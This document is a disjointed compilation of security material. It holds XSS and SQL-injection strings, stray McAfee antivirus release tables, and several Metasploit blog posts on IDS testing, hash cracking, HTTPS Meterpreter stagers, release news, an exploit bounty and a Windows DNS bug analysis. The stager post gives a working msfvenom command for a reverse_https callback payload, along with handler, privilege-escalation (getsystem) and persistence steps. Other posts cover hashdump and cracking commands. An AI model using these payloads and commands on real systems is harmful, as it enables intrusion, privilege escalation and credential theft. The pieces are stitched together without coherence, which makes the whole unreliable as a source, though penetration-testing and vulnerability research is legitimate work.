<script>alert('0wn3d')</script>
<a href="javascript:alert('0wn3d')">Click here to see a kitten</a>
<script>function _feed(s) {alert("Your private snippet is: " + s['private_snippet']);}</script><script src="http://google-gruyere.appspot.com/611788451095/feed.gtl"></script>
JohnDoe'; DROP TABLE members;--
DAT Version | Release Date | Threats Detected | New Detections | Enhanced Detections | Notable Detection
4758 | 5-9-2006 | 189,357 | 14 | 83 | X97F/Yagnuul.gen
4757 | 5-8-2006 | 189,236 | 21 | 260 |
4756 | 5-5-2006 | 189,044 | 0 | 17 | None
4771 | 5-26-2006 | 192,871 | 6 | 145 |
4770 | 5-25-2006 | 192,769 | 15 | 147 |
4769 | 5-24-2006 | 192,662 | 20 | 181 |
4768 | 5-23-2006 | 192,370 | 9 | 92 |
4767 | 5-22-2006 | 192,152 | 20 | 214 |
4766 | 5-19-2006 | 191,789 | 6 | 114 |
4765 | 5-18-2006 | 191,481 | 13 | 123 |
4764 | 5-17-2006 | 190,899 | 17 | 121 | PWS-Poker
4763 | 5-16-2006 | 190,579 | 15 | 122 |
4762 | 5-15-2006 | 190,171 | 11 | 182 | W32/Hoots.worm
4760 | 5-11-2006 | 189,590 | 6 | 72 |
4759 | 5-10-2006 | 189,440 | 6 | 164 |
One of my key objectives for developing the new vSploit modules was to test network devices such as Snort. Snort and Sourcefire's enterprise products are widely deployed in enterprises, so Snort can safely be considered the de facto standard for intrusion detection systems (IDS); so much so that even third-party intrusion detection systems often import Snort rules.
Organizations often have a tough time verifying that their IDS deployments actually work as intended, which is why I created several vSploit modules to test whether Snort sensors are seeing certain traffic. Since vSploit modules were made to trigger Snort alerts, they don't obfuscate attacks to avoid detection.
However, not every rule is used in every environment. For example, if you aren't using Microsoft FrontPage on your network, you likely won't want to use Snort's FrontPage rules. On the other hand, if you are running FrontPage, you may not want to try exploiting it because doing so may affect the production system. Because of the Metasploit Framework's flexibility, you can use the vSploit Generic HTTP Server module to host a small web server that answers all testing requests, so production systems won't be affected.
You can run vSploit modules with a mix of Metasploit Framework, Metasploit Pro, and Metasploit Express, provided there is end-to-end network connectivity to the vSploit instances:
To try out the new vSploit modules, start up the vSploit Generic HTTP Server.
Then launch FrontPage-related attack attempts:
Verify that the packets are being transmitted in Wireshark:
Finally, verify that Snort IDS sees the activity:
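A rough msfconsole sketch of this workflow is below. The module paths and target address are assumptions for illustration only (the actual vSploit module names may differ), and the Wireshark and Snort verification steps happen outside the console:
msf > use auxiliary/vsploit/http/web_server
msf auxiliary(web_server) > run -j
msf auxiliary(web_server) > use auxiliary/vsploit/http/frontpage_attack
msf auxiliary(frontpage_attack) > set RHOSTS 192.168.1.10
msf auxiliary(frontpage_attack) > run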
Metasploit vSploit Modules will be released at DEFCON 19.
HDM recently added password cracking functionality to Metasploit through the inclusion of John the Ripper in the Framework. The 'auxiliary/analyze/jtr_crack_fast' module was created to facilitate JtR's usage in the Framework and to tie directly into Express/Pro's automated collection routine. The module works against known Windows hashes (NTLM and LANMAN). It uses hashes in the database as input, so make sure you've run hashdump with a database connected to your Framework instance (Pro does this automatically) before running the module. The module collects the hashes from the database and passes them to the john binaries that are now (as of r13135) included in the Framework via a generated PWDUMP-format file.
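A minimal console walk-through, assuming you already have a Meterpreter session and a connected database (console output omitted):
msf > sessions -i 1
meterpreter > run post/windows/gather/hashdump
meterpreter > background
msf > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > run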
Several JtR modes are utilized for quick and targeted cracking. First, wordlist mode: The generated wordlist consists of the standard john wordlist with known usernames, passwords, and hostnames appended. A ruleset based on the Korelogic mutation rules is then used to generate mutations of these words. You can find the msf version of these rules here.
Once the initial wordlist bruting is complete, incremental bruting rules, aptly named All4 & Digits5, are used to brute force additional combinations. These rulesets are shown below and can be found in the same john.conf configuration file in the Framework.
Cracked values are appended to the wordlist as they're found, which is beneficial: passwords recovered from one account are frequently reused elsewhere, so each cracked value helps seed the passes that follow.
Finally, discovered username/password combinations are reported to the database and associated with the host / service.
Cracking modes:
--wordlist=<our generated wordlist> --rules single --format=lm
--incremental=All4 --format=lm
--incremental=Digits5 --format=lm
--wordlist=<our generated wordlist> --rules single --format=ntlm
--incremental=All4 --format=ntlm
--incremental=Digits5 --format=ntlm
Incremental Rulesets:
[Incremental:All4]
File = $JOHN/all.chr
MinLen = 0
MaxLen = 4
CharCount = 95
[Incremental:Digits5]
File = $JOHN/digits.chr
MinLen = 1
MaxLen = 5
CharCount = 10
As with everything in the framework, it's subject to patches and improvement, so make sure to check the code. Thanks to mubix for several edits. This info is current as of July 27, 2011.
UPDATE: Check out KoreLogic's upcoming Defcon 19 password cracking contest if you're interested in this stuff!
The Meterpreter payload within the Metasploit Framework (and used by Metasploit Pro) is an amazing toolkit for penetration testing and security assessments. Combine it with the Ruby API on the Framework side and you have the simplicity of a scripting language with the power of a remote native process. These are the things that make scripts and Post modules great, and they are what we showcase in the advanced post-exploit automation available today. Metasploit as a platform has always had a concept of an established connection equating to a session on a compromised system. Meterpreter as a payload has supported reverse TCP connections, bind shell listeners, transport over Internet Explorer using ActiveX controls (PassiveX), and more recently an HTTPS stager. This is finally changing.
Corporate egress filters are becoming tighter and the standard connect-back payload has become less useful for large-scale end-user phishing campaigns. The PassiveX payload worked well for specific versions of Internet Explorer, but is becoming harder to support due to version and platform differences. The HTTPS stager within Metasploit works, but only the first stage of the connection used the target's proxy settings and authentication; the second stage required a full persistent SSL connection from Meterpreter back to the attacking system.
Rob Fuller (who many know as mubix) was lamenting this state of affairs last Sunday and convinced me to actually do something about it. The result is native support for HTTP and HTTPS transports for the Meterpreter payload, available in the Metasploit Framework open source tree immediately. Our Metasploit Pro users will be able to take advantage of the new HTTPS stager for phishing campaigns once the code has gone through a full regression test. These payloads use the WinInet API and will leverage any proxy or authentication settings the user has configured for internet access. The HTTPS stager will cause the entire communication path to be encrypted through SSL. The HTTP stager, even without encryption, will still follow the HTTP protocol specification and allow the payload to breeze through protocol-inspecting gateways.
These new stagers (reverse_http and reverse_https) are a drastic departure from our existing payloads for one singular reason: they are no longer tied to a specific TCP session between the target and the Metasploit user. Instead of a stream-based communication model, these stagers provide a packet-based transaction system. This mode matches the behavior of many malware families and botnets. The challenge with these payloads is identifying when the user is "done"; this is accomplished in three different ways:
1. The payload has a hard-coded expiration date stamped into it during the initial staging process. By default, this is one week from the current date (relative to the target). This prevents a forgotten session from connecting back indefinitely. You can control this setting through the SessionExpirationTimeout advanced option. Setting this value to 0 indicates that it should continue connecting back until the process is forcibly killed or the target is restarted.
2. The payload has a hard-coded keep-alive timeout stamped into it during the staging process. This tells the payload to shut down on its own if it is unable to connect back for a specific number of seconds. By default this is 300 seconds (5 minutes), but it can be changed by setting the SessionCommunicationTimeout parameter. Just like the SessionExpirationTimeout option, setting this to 0 will result in a session that will never time out, which has some interesting uses, as described below.
3. Finally, the Meterpreter payload now exposes a shutdown API (core_shutdown). This is called automatically when the session is exited through the Metasploit Console. To avoid shutting down the payload but still exit the temporary session, use the detach command from the Meterpreter prompt. Keep in mind that if the SessionCommunicationTimeout is hit (5 minutes of not being able to reach a listening handler), the payload will terminate anyway. Setting that option to 0 and detaching the session will instruct the payload to keep reaching out until the SessionExpirationTimeout is reached or the process is killed.
With the new behavior and the three termination options above, some new capabilities are exposed.
If you are conducting a penetration test in which the compromised target has spotty internet access, setting SessionCommunicationTimeout to 0 will ensure that your session will reattach whenever the target comes back online (as long as the handler is running). Even better, the target will use the currently configured proxy server and authentication settings to reach the Metasploit server. Rob Fuller tested the new payloads through TOR and the payload was able to keep a session alive even when the exit nodes were being changed and the TOR service was turned on and off. This level of resiliency previously required a payload to be written to disk, which goes against one of the core principles of the Metasploit design.
If you are conducting a penetration test and want to change the IP to which your incoming connections are received, just use a DNS name for LHOST and modify the DNS record as needed (set a low TTL). If the name does not resolve and the SessionCommunicationTimeout and SessionExpirationTimeout settings have not been reached, the payload will continue trying to resolve the name and connect back. The session will continue to follow DNS changes and IP changes on the target side.
The work that was done to support a transactional HTTP-based communication model can be easily extended to support other communication channels in the future. Communicating through IRC, using Pastebin documents, or really any other form of network communication is now relatively simple to implement. Malware, botnets, and backdoors are using increasingly sophisticated communication channels and it is about time that our security tools caught up.
The command line below will generate a Windows executable that uses the new HTTPS stager:
$ msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=consulting.example.org LPORT=4443 > metasploit_https.exe
This sequence of Metasploit Console commands will configure a listener to handle the requests:
$ ./msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST consulting.example.org
msf exploit(handler) > set LPORT 4443
msf exploit(handler) > set SessionCommunicationTimeout 0
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://consulting.example.org:4443/
[*] Starting the payload handler...
Running the executable on the target results in:
[*] 192.168.0.129:51375 Request received for /INITM...
[*] 192.168.0.129:51375 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 1 opened (192.168.0.3:4443 -> 192.168.0.129:51375) at 2011-06-29 02:43:55 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: Spine\HD
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > detach
[*] Meterpreter session 1 closed. Reason: User exit
At this point, we can close the Metasploit Console and bring it up at any time.
After running the handler again with the same parameters:
[*] 192.168.0.129:51488 Request received for /CONN_mmOJARwJFmHbqXKu/...
[*] Incoming orphaned session CONN_mmOJARwJFmHbqXKu, reattaching...
[*] Meterpreter session 1 opened (192.168.0.3:4443 -> 192.168.0.129:51488) at 2011-06-29 02:44:24 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
You can see that the session has maintained state even across different instances of Metasploit.
This concept applies to background tasks like the keystroke sniffer, network sniffer, and other functions that accumulate information in the background.
-HD
Sometimes little things can make a huge difference in usability -- the Metasploit Framework Console is a great interface for getting things done quickly, but so far it has been missing the capability to save command and module output to a file. We have a lot of small hacks that make this possible for certain commands, such as the "-o" parameter to db_hosts and friends, but this didn't solve the issue of module output or general console logs.
As of revision r13028 the console now supports the spool command (similar to database consoles everywhere). This command accepts one parameter, the name of an output file. Once set, this will cause all console output to be shown on the screen and written to the file. Calling the spool command with the parameter "off" will disable the spool. Even better, this command opens the destination file in append-only mode, so you can add the following line to your ~/.msf3/msfconsole.rc to automatically log all of your output for the rest of time:
spool /home/<username>/.msf3/logs/console.log
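Interactively, the same command turns logging on and off; a quick sketch (the path is just an example, and console output is omitted):
msf > spool /tmp/engagement.log
msf > hosts
msf > spool off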
Thanks to oorang3 on freenode for the suggestion. To access the new command, use the msfupdate command on Linux (or just "svn update") or the Metasploit Update link on Windows.
If you are running a version of the Metasploit Framework that was installed with one of the binary installers prior to 3.7.2, we strongly recommend upgrading to take advantage of the improved auto-update capabilities and dependency fixes in that release.
-HD
It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's flexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old GTK-based msfgui. Taking their place are the newer Java-based msfgui and Armitage, both of which have improved by leaps and bounds since their respective introductions.
Five years ago, every exploitation tool out there was focused on running an exploit and getting a shell (usually a crappy cmd.exe shell, at that). Today, Metasploit encompasses every aspect of a penetration test. Dozens of auxiliary modules assist with reconnaissance; more than two hundred others help with information gathering and discovery; hundreds of exploits get you a toe-hold on the network; and the newest addition to the module family, post modules, helps simplify and automate increasing your access. All of the data you gather can be stored in a database. For high-quality reporting and even greater automation, Metasploit Pro rounds out an engagement. Five years ago, Metasploit had already come a long way in making exploit development easier, but the widespread adoption of DEP and ASLR has pushed the project even further toward accelerating what has now become a much more difficult process.
All of that leads us to the Metasploit Framework version 4.0, released today.
To make the awesomeness of 4.0 stand out visually from its predecessors, we've built an array of stunning new ASCII art banners. My favorite, of course, is this one:
In addition to the visual differences, Metasploit Framework 4.0 comes with an abundance of new features and bug fixes. Contributor TheLightCosine continues with his onslaught of password-stealing post modules and another contributor, Silent Dream, has begun helping out in that arena as well. Other post modules have seen considerable improvement and expansion thanks to Carlos Perez. The recent Exploit Bounty netted a total of six new exploit modules, and other development added another 14 since the last release.
Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over HTTP, and Windows can also use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. The last developer left it with little documentation on how to build it, so getting it to compile was a hurdle that we put off for too long. Now that it compiles, you can expect a more flexible payload for Linux. It still isn't perfect, nor is it nearly as complete as the Windows version, but many features already work.
Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets. As always, you can get the latest version from http://www.metasploit.com/download/ and full details of this release can be found in the Release Notes.
Everyone on the Metasploit team is proud of the first major version bump in half a decade. May it bring you many shells.
It's that time again! The Metasploit team is proud to announce the immediate release of the latest version of the Metasploit Framework, 3.7.2. Today's release includes eleven new exploit modules and fifteen post modules for your pwning pleasure. Adding to Metasploit's well-known hashdump capabilities, now you can easily steal password hashes from Linux, OSX, and Solaris. As an added bonus, if any of the passwords were hashed with crypt_blowfish (which is the default on some Linux distributions) any time since 1998, they may be considerably easier to crack. For more cracking fun, Maurizio Agazzini and Mubix's hard work has paid off in a new cachedump module. As the name implies, cachedump allows you to steal Windows cached password hashes. They can't be used directly like those obtained with hashdump, but JtR can crack them. If cracking sounds hard regardless of 13-year-old bugs and proprietary hash algorithms, you might be interested in the latest post modules from TheLightCosine: they steal passwords from several applications which conveniently store them for lazy users in what is equivalent to plaintext.
Metasploit gets better every day.
For more details about this release, see the 3.7.2 Release Notes
A few weeks ago the Metasploit team announced a bounty program for a list of 30 vulnerabilities that were still missing Metasploit exploit modules. The results so far have been extremely positive and I wanted to take a minute to share some of the statistics.
As of last night, there have been 27 participants in the bounty program resulting in 10 submissions, with 5 of those already committed to the open source repository and the rest in varying states of completeness.
One vulnerability was proven to be incredibly difficult (and likely impossible) to exploit, as Joshua Drake writes in his extensive blog post about the research process. For those who haven't spent a week banging their head against a difficult bug, this post can give you an idea how much work is involved just to state whether or not a security flaw is exploitable. Microsoft bulletins tend to err on the side of exploitability even when there isn't direct evidence to make the case for code execution.
Christopher Mcbee (Hal) deserves recognition for being the first person to submit a module for the Siemens FactoryLink vulnerability.
Alino was not only the first person to claim a $500 bounty, but he also managed to complete a second bounty as well!
Not everything went according to plan; three participants gave up before the one week deadline, eleven folks were not able to submit something in time, and one was disqualified for attempting to submit a snippet of commercial code as their own. One thing has been clear though; the Metasploit Community includes some amazing exploit developers and has an energy level that is tough to find in any other area of information security. Since the bounty was announced we have seen a record level of new patches, modules, suggestions, and community participation in the development process.
The bounty program is still running until July 20th; if you haven't had a chance to look at the list, you are running out of time to claim an item before the final deadline. Thanks again to everyone who participated so far and keep the submissions coming!
-HD
After more than 30 days of hardcore and intense exploit hunting, the Metasploit Bounty program has finally come to an end. First off, we'd like to say that even though the Metasploit Framework has made exploit development much easier, the process is not always an easy task. We're absolutely amazed at how hard our participants tried to make magic happen.
Often, the challenge begins with finding the vulnerable software. If you're lucky, you can find what you need from 3rd-party websites that mirror different versions of the application, or you can download the trial version from the vendor (that is, if the trial version is still vulnerable). If you can't find it this way, well, good luck getting your hands on it. This process alone can sometimes take more time than writing the exploit. Unfortunately, quite a few of our participants gave up at this phase.
The next thing you do is gather as much information as possible about the vulnerability (CVE, OSVDB, ZDI, mailing lists, blogs, the vendor's bug tracking system, etc.). Reverse engineer the protocol or file format you're working with, find the root cause using whatever techniques apply (patch diffing, source code auditing, fuzzing, injection, etc.), and then try to trigger a crash... hopefully a good one. On two occasions, thanks to Joshua J. Drake, Jon Butler, and Carlos' reversing-fu, we found out that CVE-2011-0657 (MS11-030) and CVE-2011-1206 (IBM Tivoli LDAP) are most likely non-exploitable. Even if a vulnerability is not exploitable, the effort spent trying to exploit it is not wasted. Often, the experience of attempting a difficult exploit can be a great learning experience, and sharing that experience gives other people insight into the real impact of the vulnerability.
Once you have a nice crash, you try to exploit the bug and gain code execution. Exploitation is all about precision, and there are many things you have to consider to get reliable code execution, which means there are many ways you can fail: a bad heap layout, overwriting a freed object with an incorrect size, some variable on the stack you forgot to account for, or overwriting a RET address, SEH handler, or ROP gadget with an address that changes with every install, every service pack, or every patch level. Sometimes you don't even realize that until you start throwing the exploit against all your VMs. If that's the case, you go back and fix it... or, worst case scenario, you rewrite the exploit four or five times just to get it right. And that sucks!
Keep in mind that all this hard work had to be done within one week, and many of the participants could only do it in their spare time. Of course, a lucky few were blessed with exploit-writing help from other people in the security community, and the Metasploit team also received assistance from fellow hackers with the vetting process. To those who helped, you know who you are -- THANK YOU! :-) We would also like to thank the following people for participating; the amount of participation we saw was unexpected and greatly appreciated (for those who specified a nickname, that's the name you'll be listed under here):
Lastly, as planned, we will move on to the payout phase. And for those who are going to Las Vegas for Black Hat / Defcon, we will see you there :-)
Early in the 3.x days, Metasploit had support for using databases through plugins. As the project grew, it became clear that tighter database integration was necessary for keeping track of the large amount of information a pentester might encounter during an engagement. To support that, we moved database functionality into the core, to be available whenever a database was connected, and later added PostgreSQL to the installer so that functionality could be used out of the box. Still, the commands for dealing with the database and the information stored there were sort of second-class citizens, all beginning with a "db_" prefix. We recently addressed this issue for the upcoming 4.0 release.
Commands that query the database have lost their "db_" prefix, while those that deal with managing the DB itself have retained it. For example, "db_hosts" is now just "hosts" and "db_status" remains the same. The idea behind this change is that hosts (and other entities) don't really have anything to do with the database other than the fact that they are stored there. Additionally, the deprecated db_import_*, db_create, and db_destroy have been removed.
The remaining commands have been improved by expanding search abilities and standardizing option parsing. So where you previously had to type full IP addresses to list more than one host, now all commands that search the database take hosts in nmap host specification format, and all of them that deal with services can take ports similarly. Furthermore, the options have been standardized a bit so -p always means port, -s always means service name.
Example usage for the services command:
msf > services 192.168.1-10.1,3,5 -p 22-25,80,443,445 192.168.99.0/24
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.99.1 22 tcp ssh open
192.168.99.141 445 tcp smb open Windows XP Service Pack 2 (language: Unknown) (name:XP-SP2) (domain:WORKGROUP)
192.168.100.129 445 tcp smb open Unix Samba 3.4.7 (language: Unknown) (name:FOO) (domain:FOO)
msf >
The new changes also make it really easy to find services running on odd ports
msf auxiliary(ssh_version) > services -s ssh
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.17.134 21 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 22 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 23 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 80 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 443 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 1433 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 8080 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 8443 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 9022 tcp ssh open SSH-2.0-OpenSSH_4.4
msf >
An often requested feature is the ability to run a module against hosts in the database that match certain criteria. That is now possible for scanner modules with the hosts and services commands' new -R flag (and --rhosts) which sets RHOSTS to the list of hosts returned. If the result is more than 5 hosts, it makes options pretty hard to read, so Metasploit writes it out to a temporary file like so:
msf auxiliary(ssh_version) > services -s ssh --rhosts
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.87.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.87.119 22 tcp ssh open SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
192.168.87.122 22 tcp ssh open SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.87.126 22 tcp ssh open SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.140 22 tcp ssh open SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
192.168.87.145 22 tcp ssh open SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.158 22 tcp ssh open SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.88.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.89.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.90.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.90.61 22 tcp ssh open SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.93.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.96.1 22 tcp ssh open SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7
192.168.96.134 22 tcp ssh open SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
192.168.98.131 22 tcp ssh open SSH-2.0-OpenSSH_5.1p1 FreeBSD-20080901
RHOSTS => file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0
msf auxiliary(ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0 yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 254 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
Another way to make dealing with all that data easier is through the use of workspaces. Workspaces have been around for a while, but they are an underused feature that allows you to separate hosts, credentials, etc. for each engagement into their own silo. Every piece of data that Metasploit records is associated with the current workspace, so it's quite easy to keep related information together and segregate different engagements by switching workspaces.
The command by itself will list available workspaces, the current one marked with an asterisk:
msf > workspace
default
* engagement_A
engagement_B
engagement_C
the_whole_friggin_internet
You can change the current workspace with workspace <name>. For extra convenience, names are tab-completable, too. You can add new workspaces with -a or delete existing ones with -d. Note that -d assumes you really meant it and will happily delete the whole thing (including hosts, credentials, loot, and all) without prompting.
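For example, using the switches described above (workspace names are just placeholders, and console output is omitted):
msf > workspace -a engagement_D
msf > workspace engagement_D
msf > workspace -d engagement_C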
The journey from a glued-on appendage, to a main feature only used by db_autopwn, to a core feature integrated with the whole framework has been an adventure. I think the result is easier access to information, better separation of that data, and a smoother, faster pentest.
It'll only be days until you can download the new Metasploit version 4.0!
The new version marks the inclusion of 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules, all added since the release of version 3.7.1 in May 2011. These additions include nine new SCADA exploits, improved 64-bit Linux payloads, exploits for Firefox and Internet Explorer, full HTTPS and HTTP Meterpreter stagers, and post-exploitation modules for dumping passwords from Outlook, WSFTP, CoreFTP, SmartFTP, TotalCommander, BitCoin, and many other applications. All of these improvements are available in all Metasploit editions - the free and open source Metasploit Framework, as well as the commercial editions Metasploit Pro and Metasploit Express.
As usual, we'll have several blog posts about developments to the Metasploit Framework in the coming weeks. In this post, I'd like to focus on some of the new features in the commercial editions. Metasploit Pro 4.0 is all about greater enterprise integration, cloud deployment options, and penetration testing automation. The best news for customers holding a valid license for Metasploit Express or Metasploit Pro: you’ll be able to upgrade free of charge. Here are some of the features in Metasploit Pro 4.0:
Make Metasploit Pro an integral part of your risk intelligence solution
Deploy Metasploit Pro in a way that works for you
Boost your penetration tests
Inform stakeholders and document compliance with updated reports
Other new features include
If you're a Metasploit Express customer and would like to know which of these features are included in your edition, please see the Metasploit Compare & Download page.
Metasploit 4.0 will be available for download in August 2011. If you can't wait that long, register for an exclusive sneak preview with HD Moore this Thursday to see the new Metasploit Pro 4.0 in action!
DAT Version | Release Date | Threats Detected | New Detections | Enhanced Detections
4761 | 5-12-2006 | 189,692 | 9 | 73
If you weren’t already aware, Rapid7 is offering a bounty for exploits that target a bunch of hand-selected, patched vulnerabilities. There are two lists to choose from, the Top 5 and the Top 25. An exploit for an issue in the Top 5 list will receive a $500 bounty and one from the Top 25 list will fetch a $100 bounty. In addition to a monetary reward, a successful participant also gets to join the elite group of people that have contributed to Metasploit over the years. Their work will be immortally assimilated into the Framework, under BSD license, for all to see.
Despite the low value of the reward, I saw this as an opportunity to make a little extra cash and take a look at a fairly challenging bug. I selected CVE-2011-0657 from the Top 5 due to my previous experience with the DNS protocol. After I claimed the bug, and checked that my name was safely in the table of players, I immediately began procrastinating.
Later that day, Jon Butler (@securitea) tweeted to the effect that he had been working on the bug. I replied, letting him know I was willing to collaborate and share the cash and glory. After discussing some logistics, Jon sent me his commented IDB of the old version of DNSAPI.dll from Windows 7 and a PoC based on Scapy. When I opened the IDB, Jon already had it pointed at the “_Dns_Ip4ReverseNameToAddress_A” function. It was well commented, but I quickly invoked the Hex-Rays decompiler and started analyzing the function. You can find the HTML output here. You probably want to keep it open in a new tab while you continue reading.
After doing some input validation, the string preceding “.in-addr.arpa” is copied into a local stack buffer on line 23. Inspecting the constraints showed that it isn’t possible to cause a buffer overflow at this point.
I read on and noticed that it was processing the local stack buffer in reverse. It starts with “v_suffix” on line 26 and looks to see if it points at a ‘.’ character. If the value ever points at the beginning of the buffer, processing is halted and the “v_return” value is written to the output “a_ret” pointer on line 49. This all seems well and good, or does it?
After looking for a few more minutes, I came to a realization. Here is an excerpt from the chat log with Jon.
(5:33:22 PM) jduck: hexrays shows two nested loops
(5:33:48 PM) jduck: while (1) { while (1) { --endptr; .... } ... --endptr; }
(5:33:55 PM) jduck: so it could double decrement
(5:34:11 PM) jduck: then the if == begin will never catch it
(5:34:39 PM) Jon Butler: hmm
(5:34:43 PM) jduck: 0.in-addr.arpa == trigger
(5:34:53 PM) Jon Butler: i'll test it
(5:35:45 PM) Jon Butler: no crash
A skilled auditor may notice my error here. I thought for sure that would crash the service, but it didn’t. So I thought some more...
(5:35:54 PM) jduck: im running thru it in my head hehe
(5:36:02 PM) Jon Butler: yeah, its all good
(5:36:06 PM) Jon Butler: cant hurt to try
(5:36:13 PM) jduck: maybe .0.in-addr.arpa ?
(5:36:16 PM) Jon Butler: i was thinking lots of dots might do it as well
(5:36:20 PM) jduck: with a preceding period
Now at this point, I had some doubt that this was the bug at all and changed the subject of our conversation before Jon got a chance to test with this input. Silly me. Also, Jon was having some issues getting a debugger attached to the service.
(5:24:47 PM) Jon Butler: also, protip: dont atatch windbg to the DNS client then wait while windbg tries to resolve microsoft.com to get symbols
Jon and I spent the rest of Tuesday evening and most of Wednesday evening flailing every which way except the right direction. Jon battled the symbol resolution problem while I went off on a tangent trying to trigger the bug in XP. By Wednesday evening (late night Wednesday for Jon), he had solved the symbol issue and begun stepping through the code to gain a better understanding. We threw several ideas back and forth, but none of them led to a crash. Eventually, time got the better of us and we called it a day.
NOTE: In order to work around the symbol issue, it's possible to use the “symchk” executable to download the symbols for the “dnscache” service process before attaching to it. Once downloaded, set the _NT_SYMBOL_PATH variable to point to *ONLY* the local symbol directory, and voila.
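A rough sketch of that workaround from an administrative command prompt (the local symbol directory and the public Microsoft symbol server URL are the usual defaults; adjust as needed):
C:\> symchk C:\Windows\System32\dnsapi.dll /s SRV*C:\symbols*http://msdl.microsoft.com/download/symbols
C:\> set _NT_SYMBOL_PATH=C:\symbols
C:\> tasklist /svc | findstr /i dnscache
C:\> windbg -p <pid of the svchost.exe hosting dnscache>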
Thursday, Jon came online and we continued reviewing the changed functions within the XP DNSAPI.dll. We were hoping that they might give us some insight that we didn’t get before. On Jon’s recommendation, I asked HD about the Windows XP vector. It went something like this:
19:54 <@jduck> will rapid7 give $500 for the local xp exploit?
19:54 <@hdm> jduck: sure if its a remote on windows 7
So I abandoned my efforts trying to trigger the bug via the LPC on XP, and diverted my attention back to Windows 7. I started by going back through the changes (still using XP binaries) one at a time, hoping to eliminate any that weren’t security related. I found some changes related to locking, but it’s unclear if they were relevant. After I went through all of these changes and didn’t find any glaring issues, I went back to diffing the Windows 7 binaries. I grabbed fresh copies of the DLLs, grabbed fresh copies of their symbols, created fresh IDBs and BinDiff'd them. To my surprise, there were only four changed functions!
After getting my Windows 7 VM going and working around the symbol resolution issue, I started playing around with sending inputs. I read the IPv6 version, “_Dns_Ip6ReverseNameToAddress_A”, and spent a couple of hours sending various inputs. Finally, I got a crash!
Unfortunately, it was only a 0xc00000fd exception. The human-readable description of this exception code, which irks one of my pet peeves, is often displayed as “Stack Overflow”. This is not the kind of crash you want to see when developing an exploit since this kind of crash is rarely exploitable. In this particular case, there is no exception handler, so it simply kills the process. The service is set to restart automatically twice, and reset counts after one day, but that isn’t terribly helpful (try: sc qfailure dnscache).
Let’s take another look at the decompiler output for the Ip4 version. Consider an input string of “.0.in-addr.arpa”. On the first iteration, a ‘0’ will be found, so “v_suffix” will simply be decremented. On the second iteration, a ‘.’ character is found on line 33. Next, it is overwritten with a NUL byte on line 38 and re-incremented. The “strtoul” function is called on line 40 and the return value from it is merged into the ultimate return value on line 43. Since “v_suffix” does not point to the beginning of the buffer, it will be decremented on line 47. Note that after decrementing the pointer here, it will point at the beginning of the buffer (the first ‘.’ character). The next statement that is executed is “--v_suffix;” on line 32. At this point, the pointer has escaped the bounds of the local buffer, and will never again have the chance to point to the beginning. If no ‘.’ character is found before the beginning of the stack is reached, the 0xc00000fd exception will be raised when the guard page at the top of the stack is accessed.
